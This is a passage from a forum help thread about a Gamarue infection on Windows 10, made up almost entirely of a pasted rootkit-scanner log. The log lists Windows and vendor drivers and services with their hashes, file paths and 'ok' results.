21:37:16.0708 0x1ac0 HomeGroupProvider - ok 21:37:16.0724 0x1ac0 [ 8ADD9CA3E0F18CEA11EA6FAED794A228, B46BA885ED8253A253B1C87C331CA145F7F397AF49853038B3F1EDAF81B2C4BA ] HpSAMD C:\WINDOWS\system32\drivers\HpSAMD.sys 21:37:16.0739 0x1ac0 HpSAMD - ok 21:37:16.0755 0x1ac0 [ 2413454E305678EA9A486E8DE2E67849, 5E821E909F99BAB782D89A0CDBFAE5474FEA211EB4F626A824D10D733F3FDC67 ] HTTP C:\WINDOWS\system32\drivers\HTTP.sys 21:37:16.0786 0x1ac0 HTTP - ok 21:37:16.0802 0x1ac0 [ D3C45F1B5BB3EE772CDA416A4A3EEB9B, 97CD988CF307EBCC34F37F130F4F2C989DD17E70B2498DB1929B566A3387887B ] HvHost C:\WINDOWS\System32\hvhostsvc.dll 21:37:16.0802 0x1ac0 HvHost - ok 21:37:16.0817 0x1ac0 [ F60F8390B635156593F7493AE898AFB0, AC5E58CDA12072C5FDBFEA0FA009CE2E251D143FC0878B2658ECCCF797B8B0EC ] hvservice C:\WINDOWS\system32\drivers\hvservice.sys 21:37:16.0817 0x1ac0 hvservice - ok 21:37:16.0817 0x1ac0 [ 563F5FC3B46A70A91AB6C8822AC8BF25, 43E647A7752D7444BF306E38571130AB778AA2A6892782C6C1112E47FBEFBC87 ] hwpolicy C:\WINDOWS\system32\drivers\hwpolicy.sys 21:37:16.0833 0x1ac0 hwpolicy - ok 21:37:16.0833 0x1ac0 [ C082249BC3E972C8A132D9EC6AD9EAD5, 
D69EEFD97CF5E0BD64D11DE1C331D02A9BE522BB93A40FF32ED434D960B85D39 ] hyperkbd C:\WINDOWS\System32\drivers\hyperkbd.sys 21:37:16.0849 0x1ac0 hyperkbd - ok 21:37:16.0849 0x1ac0 [ C6C8315E3262FAE460529C6DA2951682, 4ADBFA6601209BF6F5A9797721CBE2011905775CF4E266D7B42F89915D477E95 ] i8042prt C:\WINDOWS\System32\drivers\i8042prt.sys 21:37:16.0864 0x1ac0 i8042prt - ok 21:37:16.0864 0x1ac0 [ C6B8743B213F06AA60943D8366FE968F, 758954F70B810063914B243115B2C753B2BCE40190F95C30ACBA0BF04EBD5B33 ] iagpio C:\WINDOWS\System32\drivers\iagpio.sys 21:37:16.0880 0x1ac0 iagpio - ok 21:37:16.0880 0x1ac0 [ 9A2A2F3C69B9A30B6E78536F6D258BAD, 5E28E132A7300E6F5E0C6439D6BA00F1AEF66D729FF671FDA91274A25A921463 ] iai2c C:\WINDOWS\System32\drivers\iai2c.sys 21:37:16.0896 0x1ac0 iai2c - ok 21:37:16.0911 0x1ac0 [ 42962355A7911407026E920E7252E3E5, 4A4016A53ED61354C81C594968339E6F3CCCFF4A64F8F28AD008ED8137E05AD2 ] iaLPSS2i_GPIO2 C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys 21:37:16.0911 0x1ac0 iaLPSS2i_GPIO2 - ok 21:37:16.0927 0x1ac0 [ BD47B2FEABFA48C6224D43EE9EA9BC06, 304628CA458AA7B1B8B1CFF12074AD75C1CE7BD41820B99607D7FA99A817D007 ] iaLPSS2i_GPIO2_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys 21:37:16.0927 0x1ac0 iaLPSS2i_GPIO2_BXT_P - ok 21:37:16.0942 0x1ac0 [ 2184CB3A65888F446FCD6DBA9F073F4C, 0B3D63EC7F61BFAD490C123084965A9F38DBFE587AC9DAE6F4E6B68AD8093DB2 ] iaLPSS2i_I2C C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys 21:37:16.0942 0x1ac0 iaLPSS2i_I2C - ok 21:37:16.0958 0x1ac0 [ 4126F8DA08CE7924A3AE6F7235F85D5F, 668DC1D09496A95F44C07C5C1F6ED7D3EFC6F89523B2744A86B460E5BECAEFB5 ] iaLPSS2i_I2C_BXT_P C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys 21:37:16.0974 0x1ac0 iaLPSS2i_I2C_BXT_P - ok 21:37:16.0974 0x1ac0 [ 16A10CCEDCF5AC4CAAE43DC9FC40392F, F77696AE55B992154A3B35F7660BD73E0AB35A6ECEEC1931C0D35748CFA605C0 ] iaLPSSi_GPIO C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys 21:37:16.0974 0x1ac0 iaLPSSi_GPIO - ok 21:37:16.0989 0x1ac0 [ EB82A11613326691508D9ED9A4FE29E7, 
8445E41BAB21964C7F014742795E462BDDC6C37A261990B3D6BF4E637A719547 ] iaLPSSi_I2C C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys 21:37:17.0005 0x1ac0 iaLPSSi_I2C - ok 21:37:17.0021 0x1ac0 [ 12859E1215AA083A42E7ADCDE5C061D1, 262F9C65C3FA7EB69C4FA7C6547E1C79DB49697A083309909BC78726A116557F ] iaStorA C:\WINDOWS\system32\drivers\iaStorA.sys 21:37:17.0052 0x1ac0 iaStorA - ok 21:37:17.0067 0x1ac0 [ D820075D3395BED28FC57AEF8FBA666F, 7589CCCD355D2685C0E6D317AB39F0DB061153E6859A0F53834B001643CFDF57 ] iaStorAV C:\WINDOWS\system32\drivers\iaStorAV.sys 21:37:17.0099 0x1ac0 iaStorAV - ok 21:37:17.0099 0x1ac0 [ A243E0CE8644378C9A9D015ABC3EDA27, 0C72F6D39DD64A16F54BCE185F4D8E670D386823F6364E9ED284F7F8DE11CBF5 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys 21:37:17.0130 0x1ac0 iaStorV - ok 21:37:17.0146 0x1ac0 [ E16E4FC9F250E48CB2CAD93E59D010E2, EFF558EDD63DB0FD8BA240E94BD5999106233B95BF86BFB99EE9B897F41C542B ] ibbus C:\WINDOWS\System32\drivers\ibbus.sys 21:37:17.0177 0x1ac0 ibbus - ok 21:37:17.0177 0x1ac0 [ 053DFE4E6324B828C16CB6F5B9F20790, 17347896126DE49C570D2AC025F2A4BB8250B67ECD6A6D31B80EBD9423799F0B ] IBMPMDRV C:\WINDOWS\system32\DRIVERS\ibmpmdrv.sys 21:37:17.0177 0x1ac0 IBMPMDRV - ok 21:37:17.0192 0x1ac0 [ D84EF85ED4F2044784A44C211A27D065, FA18EA57507353DC3DB18F840F0499D7874AC055E3190E4D76DB9AA1021FC674 ] IBMPMSVC C:\WINDOWS\system32\ibmpmsvc.exe 21:37:17.0192 0x1ac0 IBMPMSVC - ok 21:37:17.0208 0x1ac0 ibtsiva - ok 21:37:17.0208 0x1ac0 [ 18F7B1E3C5DE1CC8B3D2BBF90F7350EF, 750BB014CD290988D949FC566828B126D9A5B9D04EDF9E124680ECFFBC97D7AF ] ibtusb C:\WINDOWS\system32\DRIVERS\ibtusb.sys 21:37:17.0255 0x1ac0 ibtusb - ok 21:37:17.0255 0x1ac0 [ E3061D5ABA80394D29E26EA58AF7F69A, 9BCF1AD2CC9C7E48FD350F9D59797E17F355C840EDE428143764F93716159C20 ] icssvc C:\WINDOWS\System32\tetheringservice.dll 21:37:17.0271 0x1ac0 icssvc - ok 21:37:17.0411 0x1ac0 [ 658287D76E8D77C08AE98989F99B8948, DBA67B5772E1FE43ABDB3908A1CF86D76F2774BABC20359D2511F06A2A8CAC57 ] igfx 
C:\WINDOWS\system32\DRIVERS\igdkmd64.sys 21:37:17.0567 0x1ac0 igfx - ok 21:37:17.0583 0x1ac0 [ A105AD05696D55E6E4F078ED850F6305, 8121A4226D2941EDD4809D516E7684E5C7164ADCF5AA4C8BC6620110625D3E8D ] igfxCUIService2.0.0.0 C:\WINDOWS\system32\igfxCUIService.exe 21:37:17.0599 0x1ac0 igfxCUIService2.0.0.0 - ok 21:37:17.0614 0x1ac0 [ E9E4BB312F6B544392F44D513FAA2243, 3E6917BCE9F1AF554D57FED9E76B33F36D92145B0090A5F8F64E2A53EB4C54A4 ] IKEEXT C:\WINDOWS\System32\ikeext.dll 21:37:17.0661 0x1ac0 IKEEXT - ok 21:37:17.0661 0x1ac0 [ 8A268094274301F2673D0D656BF763E5, 7633741B393D4A3151425D4FBB0C0EB9D5E2B31A707710E23F4B749C08248C54 ] ImControllerService C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe 21:37:17.0661 0x1ac0 ImControllerService - ok 21:37:17.0661 0x1ac0 [ 0E33BC018502E7FDE77C343055D9C626, CD1C60E8EDAA044E03E5776962E091C1288204033A57A799D446F9B058D6AD59 ] IndirectKmd C:\WINDOWS\System32\drivers\IndirectKmd.sys 21:37:17.0677 0x1ac0 IndirectKmd - ok 21:37:17.0802 0x1ac0 [ C703E251B977F41231E28F45DE7A7A56, 144B7F374679EABB149A9E907C45EE7C77A18D1A15F6714635558026ADBBE2BD ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys 21:37:17.0896 0x1ac0 IntcAzAudAddService - ok 21:37:17.0911 0x1ac0 [ E300D1E37B737ED14F7A08CD5604E5D9, 5C1135081E29D7F4A97D5CAA2C8FBE1DD04EC7A3D8E648E69F2AA9EBDD88EBBB ] IntcDAud C:\WINDOWS\system32\DRIVERS\IntcDAud.sys 21:37:17.0927 0x1ac0 IntcDAud - ok 21:37:17.0942 0x1ac0 [ AE32376564771525DCDD2F0280619E1A, 233B7B272DCD9080DE7C9593EB7993745D1037EA87B69617E7176F074DFD5968 ] Intel(R) Capability Licensing Service TCP IP Interface C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe 21:37:18.0083 0x1ac0 Intel(R) Capability Licensing Service TCP IP Interface - ok 21:37:18.0083 0x1ac0 [ 72586E6D6DD4144D0C4CBD9D2653BBED, 3EE3CBB98D7A2CEEC92A86D5D2F49733BB1FD42F45CDE8973B71022E57093BBA ] IntelHSWPcc C:\WINDOWS\system32\drivers\IntelPcc.sys 21:37:18.0099 0x1ac0 IntelHSWPcc - ok 21:37:18.0099 0x1ac0 [ 
4B7F8A1AAC7172DB6918A0E10E1D78A3, 1E9922AF9B5458F23A379EDCD61B615B6E53BAF8927237C1C7DCC04122CCF417 ] intelide C:\WINDOWS\system32\drivers\intelide.sys 21:37:18.0099 0x1ac0 intelide - ok 21:37:18.0114 0x1ac0 [ 0A3DBE89C965FFB7C0D0E38834E77B90, 0166BE79228ED6B3D7AA1BACB4F1BB68357DBF70DF778B2F8A3776E374EE690C ] intelpep C:\WINDOWS\system32\drivers\intelpep.sys 21:37:18.0114 0x1ac0 intelpep - ok 21:37:18.0130 0x1ac0 [ 64EC687A811DC4F69DF3816F073352AA, F70942B67448DF9848F32F88D37E1E0C548CE9FEFC4376628D7CBEF62494D8E1 ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys 21:37:18.0130 0x1ac0 intelppm - ok 21:37:18.0146 0x1ac0 [ 549C278119FF539C3B219C55B98B0E87, B4C15AB0C77EAB6C5ADEBD014F610BBFC537EAEB0E3960636624001C8A5DE56E ] iorate C:\WINDOWS\system32\drivers\iorate.sys 21:37:18.0146 0x1ac0 iorate - ok 21:37:18.0146 0x1ac0 [ A0F9F2E87F0C751FE164D90EB44A9B63, BE816F17E43E5F80AC65E913AB7F9E77B8D6B70B90A784CB00C907D3DAFFD4DB ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys 21:37:18.0161 0x1ac0 IpFilterDriver - ok 21:37:18.0192 0x1ac0 [ 57A93FCF94FAB8C2161335E56C81CD16, 4A642E4FF70DA209074B78EC50B76A024DB5D01B8C9FCC405A64AF0F1A7EA389 ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll 21:37:18.0271 0x1ac0 iphlpsvc - ok 21:37:18.0271 0x1ac0 [ 656DDB34996A96539BA6E2843B5F2A77, EDC3F1A2BA38A9655361A20B6C8001984AEB1A530C5385CF6EC0AF595305DBC7 ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys 21:37:18.0286 0x1ac0 IPMIDRV - ok 21:37:18.0286 0x1ac0 [ DCC05E5EAA580C97F13B434FAFACED85, 5C6CFD3D9FAEB7274E05F3D19D3AA064624500C616650DE227B849B505662BB4 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys 21:37:18.0302 0x1ac0 IPNAT - ok 21:37:18.0302 0x1ac0 [ 9A6B993A95CCA15502DE3C980508DC44, 370A1A4531A72CFBF331ED274913925A269115A13E3A6B5E1821FB48DD7242AE ] IpxlatCfgSvc C:\WINDOWS\System32\IpxlatCfg.dll 21:37:18.0317 0x1ac0 IpxlatCfgSvc - ok 21:37:18.0333 0x1ac0 [ 9035C10C7EB8CF7C87CEA82A62EBB43A, A0DA94E80E503DB3C2877CE1BCDC70B3FCC6861ADFBCCE66C6D2592BD63F27DC ] irda 
C:\WINDOWS\system32\drivers\irda.sys 21:37:18.0364 0x1ac0 irda - ok 21:37:18.0364 0x1ac0 [ E7FD479E3298F3C8852A0D2F092BDB35, 07F2E779268EBBF4F32ED1C8423493B36BA823905E71B524C6AEBA0093193307 ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys 21:37:18.0380 0x1ac0 IRENUM - ok 21:37:18.0396 0x1ac0 [ 65B145143F6E5E1B5A213F0D9F4C4C44, 0E390BD8D7B4B9562E8FEE0D109DCE0D9EA823FD2D20B39FFACE3331F30FE5BC ] irmon C:\WINDOWS\System32\irmon.dll 21:37:18.0411 0x1ac0 irmon - ok 21:37:18.0411 0x1ac0 [ 7FE3B3A30FA20F27AF7022A01C2266BA, 8AB924F08ABF1DCB154B6A3BDB7E3E5A863008B5AFF8E3DB9759848774E00E8A ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys 21:37:18.0427 0x1ac0 isapnp - ok 21:37:18.0442 0x1ac0 [ D492648D96A14BA639B76D177B24CD82, D65D2494BAC8A317FD70293E59D039078D1D19FAE20A4EB2665246CAACFF0C6F ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys 21:37:18.0474 0x1ac0 iScsiPrt - ok 21:37:18.0489 0x1ac0 [ 6809AB5A3979D1DBA294E548B6CB23B1, 30AAE0C99874570C34A4D750B7049BA28BEFBB55F40A1B4A00A3A19D49332EEF ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe 21:37:18.0505 0x1ac0 jhi_service - ok 21:37:18.0521 0x1ac0 [ D36B404BF979297C6572AEF98B2594F2, CB2F4E6589936D35D59CA70B39A29D091540EA125BE4B937AF92CEA0C6D0AAEB ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys 21:37:18.0536 0x1ac0 kbdclass - ok 21:37:18.0536 0x1ac0 [ 7E2036A846789D6D6A2EE21915017EE1, 82AF85CA30B440E453F7694C7EDABB5D2DB213AD2FE8620B92667DFB492229A1 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys 21:37:18.0552 0x1ac0 kbdhid - ok 21:37:18.0567 0x1ac0 [ 4C054B8E901F41F5743DADE8A29FF256, 1009CC2503E08AFEA849BA83135C2D75C573FC4D6EFB5DBCDCC7ACB17AF83152 ] kdnic C:\WINDOWS\System32\drivers\kdnic.sys 21:37:18.0583 0x1ac0 kdnic - ok 21:37:18.0583 0x1ac0 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] KeyIso C:\WINDOWS\system32\lsass.exe 21:37:18.0614 0x1ac0 KeyIso - ok 21:37:18.0614 0x1ac0 [ BA7A5838866618A4E82FBC05B8923605, 
96E898C7768BED66487A00E02B2E50516602BCF54E6648F5528E3334AE8527EB ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys 21:37:18.0630 0x1ac0 KSecDD - ok 21:37:18.0646 0x1ac0 [ 6629CAA1F157088B9EDD1EAD24C6D753, 3E5F3BCB34F4B52BE46B96F9F720FE5FB37A01D4E408875F6BB89F5B5C5A3900 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys 21:37:18.0661 0x1ac0 KSecPkg - ok 21:37:18.0677 0x1ac0 [ 9778205F28DC4F2EFFCC146647FE5CF0, 6B7EFFB08C7757A2830745920A624F89DBD5B323E0A884932FECF06471894F9D ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys 21:37:18.0692 0x1ac0 ksthunk - ok 21:37:18.0708 0x1ac0 [ 08F9C3F7FE3019BF53B1405B1820528F, E90940533F88A33C396E1DF9D186E945F030315FB2201E479F144E27387333CA ] KtmRm C:\WINDOWS\system32\msdtckrm.dll 21:37:18.0755 0x1ac0 KtmRm - ok 21:37:18.0771 0x1ac0 [ 0DD3C5101AE1AA7E28B4CE5AB190C261, FAFFE2102972798210ED5E766F54C5EED6262354E132E1C24539DAA598895608 ] LanmanServer C:\WINDOWS\system32\srvsvc.dll 21:37:18.0817 0x1ac0 LanmanServer - ok 21:37:18.0849 0x1ac0 [ B82D6C634638534E41748FCEC909E55D, C286EB7B3E780549F77E75B4B9F053861D82EFDCD43B1308848A08D23EFADDCA ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll 21:37:18.0911 0x1ac0 LanmanWorkstation - ok 21:37:19.0036 0x1ac0 [ F0CF1A5E98B8CEFDA41146173C449985, F8993C93C19CF86A36400C4381D44F90973A27EA0CCA84E1D87541734E06C58A ] Lenovo Instant On C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe 21:37:19.0130 0x1ac0 Lenovo Instant On - ok |
04.07.2017, 20:50 | #11 |
| Windows 10 - Gamarue Still step 1: Code:
0x1ac0 [ 0CD29540C32C2E2E0E3D7E9832752AF3, E64C3F5323C59D53409E33E88989FDD2A38B5B602336FC1D8C3702CA9B5EBFC7 ] Modem C:\WINDOWS\system32\drivers\modem.sys 21:37:20.0396 0x1ac0 Modem - ok 21:37:20.0396 0x1ac0 [ 534477FCAFDFCA6B841BFA06BD26BCC5, 96404FDF0BA2127A3BD24319637EC0C8BE8C42618D9FEDF66F41C5F72840D427 ] monitor C:\WINDOWS\System32\drivers\monitor.sys 21:37:20.0427 0x1ac0 monitor - ok 21:37:20.0427 0x1ac0 [ F5D4E18A70BA069D479154442CDEB60D, 96345E88BC6A50415E112A4B4CFDF3F4306EA049741C5B0A2BFFC142F15EB5CB ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys 21:37:20.0442 0x1ac0 mouclass - ok 21:37:20.0458 0x1ac0 [ 5C09868963B0C076AC3BC7759A46B7B1, 64CD200A8D90CDC31317009636A3BB6574ABF04BCAC903F93C47823C40CC03F6 ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys 21:37:20.0474 0x1ac0 mouhid - ok 21:37:20.0489 0x1ac0 [ 8BF7039787036529B98E50AE86A0E46B, 69C04D012D026A14E2D2A138EDA79227F9BE4BE1892D517DCDB797F2A5AEDB14 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys 21:37:20.0505 0x1ac0 mountmgr - ok 21:37:20.0505 0x1ac0 [ AD118EC95E9EF4D5223D681D8F183567, 395B76626956F5B7992676B9CA57B2CA075F0CDA881E14B3ED07ABE2DC0EEDBC ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys 21:37:20.0536 0x1ac0 mpsdrv - ok 21:37:20.0583 0x1ac0 [ FA53A01517BBA97EA3B71CF5CC2052F4, C6F7CBDFAD629B2D4B6ED6A471708E8DBEB5CD5E0A992848359D3C0A82FDFCBE ] MpsSvc C:\WINDOWS\system32\mpssvc.dll 21:37:20.0630 0x1ac0 MpsSvc - ok 21:37:20.0646 0x1ac0 [ 84A7AF1DB4EEBEDBA3F41FF4D3234091, F49E140D0DEA2BB98205A8CA7C0ECB366FFF02D528A83760E9358DFCFF5A90D8 ] MQAC C:\WINDOWS\system32\drivers\mqac.sys 21:37:20.0661 0x1ac0 MQAC - ok 21:37:20.0677 0x1ac0 [ D14C297933C82B8CB0B5CBBA4DDC830B, 2EF356F5373F16A7AE2421187FC5C150C09452C835229275B7403181D65C210F ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys 21:37:20.0692 0x1ac0 MRxDAV - ok 21:37:20.0708 0x1ac0 [ F2AD1B72C5A6475FB5FF332E1980DF88, 41E24496FBD61C0A333F567DA7C4E38C5A792724FB56448189099F60114749D5 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys 21:37:20.0724 
0x1ac0 mrxsmb - ok 21:37:20.0739 0x1ac0 [ 469DD958B1D8CB09E38BE2298B8C398D, 97CCEFF58D8865B0D27C4E16B082C20FA5279CF01A37F47B5F2DA39B334F0667 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys 21:37:20.0755 0x1ac0 mrxsmb10 - ok 21:37:20.0771 0x1ac0 [ 1FC4802B593494746B6FE3BDAC25E371, 774CC950B46B3E32603D368D9938BFCF60D2BB3C14C3FE8B03CB1E724AAC29EF ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys 21:37:20.0771 0x1ac0 mrxsmb20 - ok 21:37:20.0786 0x1ac0 [ BD12E1941A87671A767447B02C6A51A1, 7FCB3077E827639CE23CC2C6FE997A33F7A702D266C0277AF01453B5ACC0966D ] MsBridge C:\WINDOWS\system32\drivers\bridge.sys 21:37:20.0802 0x1ac0 MsBridge - ok 21:37:20.0802 0x1ac0 [ 41C5D9B52F4A1B30C3F7219D601CF12C, E1C1B1CED19D32FA1B765C7C380B9E749893B2018CF358F448E40DA60CB63166 ] MSDTC C:\WINDOWS\System32\msdtc.exe 21:37:20.0817 0x1ac0 MSDTC - ok 21:37:20.0817 0x1ac0 [ 92C00BD9616F353CA59A755C33269757, E67F05A4A1C44137CCAC0C7292A7010B5920172ACAE32638600E231F28F33035 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys 21:37:20.0833 0x1ac0 Msfs - ok 21:37:20.0833 0x1ac0 [ F27EC8F7A0A779276E5DA2E70C2B01EE, A450DB309F84CAFFCE2A720612BDB260D88E9C390D2BC60874D73A55D8567E04 ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys 21:37:20.0849 0x1ac0 msgpiowin32 - ok 21:37:20.0849 0x1ac0 [ CBA955A54C9446CAAD28C76789D3B071, F6CA1BECA35B13B7CCC9FFB325FACF22713F6B81E8A6540C9967A462E425BBEC ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys 21:37:20.0864 0x1ac0 mshidkmdf - ok 21:37:20.0864 0x1ac0 [ E8E568EF60677E4534F387C53EE1B35F, 2E250EE1A9AE8AFDCA5216BED87328B05713386BD7E61C66A74EF021F2AFE7D7 ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys 21:37:20.0864 0x1ac0 mshidumdf - ok 21:37:20.0880 0x1ac0 [ 16376B7B0730C04DD1A2C0CC8E09E420, 2F39D3254FD272E277B5496A8C93A7CBFBF80F6004AE0343BE9F09C538975910 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys 21:37:20.0880 0x1ac0 msisadrv - ok 21:37:20.0896 0x1ac0 [ 75FE54E84C1EB0C9C5E09F9FD5928ECC, 
971CFEE8FB8364D17CD392E32A32AE57BE6461EAB6C580B52E6D752D4CFDD6B3 ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll 21:37:20.0896 0x1ac0 MSiSCSI - ok 21:37:20.0911 0x1ac0 msiserver - ok 21:37:20.0911 0x1ac0 [ B26E1C10C8323D2B6ADAF504CD487757, 758DBCDA43D62547ED274D2E09A66B266470C86A89A3BEF387E535DB37A7EA44 ] MSKSSRV C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys 21:37:20.0927 0x1ac0 MSKSSRV - ok 21:37:20.0927 0x1ac0 [ E40B960078A15D4901265D32E071C42D, AC11B8221C8F529FE3CA6FEB99AF699664C86008A732C3A8E6B1CE31C2272454 ] MsLldp C:\WINDOWS\system32\drivers\mslldp.sys 21:37:20.0942 0x1ac0 MsLldp - ok 21:37:20.0958 0x1ac0 [ 1EC9FC8E5101139CF84589E8EAC24B9A, F351661FC548FEC2652018B4F1A2BC64FD938637A518EEDC9B6ED97471BAAC9B ] MSMQ C:\WINDOWS\system32\mqsvc.exe 21:37:20.0958 0x1ac0 MSMQ - ok 21:37:20.0958 0x1ac0 [ B4860AB91DC4E73936F0FF504D6B4B07, 7371093D9EB62218D20F6B8B3C88CBF01932AEA2923ED119962A78BE46E5A939 ] MSPCLOCK C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys 21:37:20.0974 0x1ac0 MSPCLOCK - ok 21:37:20.0989 0x1ac0 [ 8EDC45C3F7F64A51C98B59E24648F74B, 445731F32A37A99FAB3CD5D178A84FB4F835727826211FF18623409D29FF3A1A ] MSPQM C:\WINDOWS\system32\DRIVERS\MSPQM.sys 21:37:21.0005 0x1ac0 MSPQM - ok 21:37:21.0005 0x1ac0 [ 7DA5FAC2A49D30CA5B7B96B8B26281AC, 168C3AA5C7318184D8F67EA832920FCE64E11D4CC418517D7BDACB9632F0BEA8 ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys 21:37:21.0021 0x1ac0 MsRPC - ok 21:37:21.0036 0x1ac0 [ 4369BBFCDDCCE61856DD862C8E5C4E19, 23BA06675997A3A46723D0FC9E3DFEBC17E4149FC67B9DCED3011BBB5B5DCFF9 ] MsSecFlt C:\WINDOWS\system32\drivers\mssecflt.sys 21:37:21.0052 0x1ac0 MsSecFlt - ok 21:37:21.0052 0x1ac0 [ 7E3365C8BC83DCE88D6226BB5C7170C4, 69D741039CAAFCA93A4CC09CEC14F117527D732A6CF3077AA83E935B03EC3F9C ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys 21:37:21.0052 0x1ac0 mssmbios - ok 21:37:21.0067 0x1ac0 [ 09D51564E49181E9928910D6B91C920E, FB3C918820ACF4506AC49478709B4D4C6489BA0B5113E666C34B916CA5CD6DE7 ] MSTEE C:\WINDOWS\system32\DRIVERS\MSTEE.sys 21:37:21.0083 0x1ac0 MSTEE 
- ok 21:37:21.0083 0x1ac0 [ 793AE56A3946EAD5F906C28D294FEFE6, BB563D088084026606C2FBD30A0850BA18363CC173CC6C77272D727CA6C1F9BD ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys 21:37:21.0099 0x1ac0 MTConfig - ok 21:37:21.0099 0x1ac0 [ E35F51C7474A26680627477462715206, 435490915CDD416D666B64C6B4526285EC946E6918CFA85585692B9ED43518B6 ] Mup C:\WINDOWS\system32\Drivers\mup.sys 21:37:21.0114 0x1ac0 Mup - ok 21:37:21.0114 0x1ac0 [ 74BD1149BF50F1E24934042A3BD17C90, DC4626DC4D629CA7DF336EC7E6435F27D2E252D81945E57F4BF2C981DBCD9B45 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys 21:37:21.0114 0x1ac0 mvumis - ok 21:37:21.0130 0x1ac0 [ BC7747F959BBA12C1ACD1BD483B9DC91, 81562A3CCF35A770A0562A576834A34E16AC730C061038A544768439E4B29102 ] MyWiFiDHCPDNS C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe 21:37:21.0146 0x1ac0 MyWiFiDHCPDNS - ok 21:37:21.0146 0x1ac0 [ 39C772E20B8C61858F969E4D60699D89, 32146D265CD315597C48FB233D77DDACB0FEDDB7E800A0F411A67844BB3ACC67 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys 21:37:21.0192 0x1ac0 NativeWifiP - ok 21:37:21.0208 0x1ac0 [ BC80F85C129F12A5F64D6741A120B539, AD410F13BCBDE54F98E353BD4DAF30CC5A0A9990FC4F1AB3623EF3175EEBCAF7 ] NaturalAuthentication C:\WINDOWS\System32\NaturalAuth.dll 21:37:21.0239 0x1ac0 NaturalAuthentication - ok 21:37:21.0239 0x1ac0 [ F2EA6F3165E154C24C084AC35DD6C3F8, 4F8CB75770945F5A28CC308917A124109F7462CE933695B9CAA3FE2CAE76C445 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll 21:37:21.0271 0x1ac0 NcaSvc - ok 21:37:21.0286 0x1ac0 [ 9B3C6582CFB91BA2A04B1D06D8E2FB98, 431E6B075FD24002724E8A2ED9FB3221AD66D1F1D021B56466187D97E5B43A1F ] NcbService C:\WINDOWS\System32\ncbservice.dll 21:37:21.0333 0x1ac0 NcbService - ok 21:37:21.0333 0x1ac0 [ 932E2E43078A3D786A46A5428F21B314, 17F1CC3388D80F1E1850063114C1EB72EEA149D9C8FA3501C0F9EB55C9E0C58D ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll 21:37:21.0396 0x1ac0 NcdAutoSetup - ok 21:37:21.0396 0x1ac0 [ 0FFE8AF1B94C5FD54E6ACC6DAE990D31, 
B67D3CA3460D4700D8B83EFE4B6A7AA940650E84D985484FBAA1EE80F3632133 ] ndfltr C:\WINDOWS\System32\drivers\ndfltr.sys 21:37:21.0427 0x1ac0 ndfltr - ok 21:37:21.0474 0x1ac0 [ E27876B335FEB441DA511030AA85624D, 6B4FA08463166A2B32F317E6FEDE3C22EB8FFA5B2077955A0B2F2184858BDDE7 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys 21:37:21.0521 0x1ac0 NDIS - ok 21:37:21.0521 0x1ac0 [ 4EA73CFDEE4A628D387D95464A131F29, 38A6E2389FA9B20A7AFDF3CFCD13B66489B92D853EE486BF81019F0A36A142E1 ] NdisCap C:\WINDOWS\system32\drivers\ndiscap.sys 21:37:21.0536 0x1ac0 NdisCap - ok 21:37:21.0552 0x1ac0 [ EB127689AF6F24091AB73538A556257F, BC25067D355084D6893E9262750433044C28893BB27A67BF7AF5008742C6D359 ] NdisImPlatform C:\WINDOWS\system32\drivers\NdisImPlatform.sys 21:37:21.0567 0x1ac0 NdisImPlatform - ok 21:37:21.0567 0x1ac0 [ 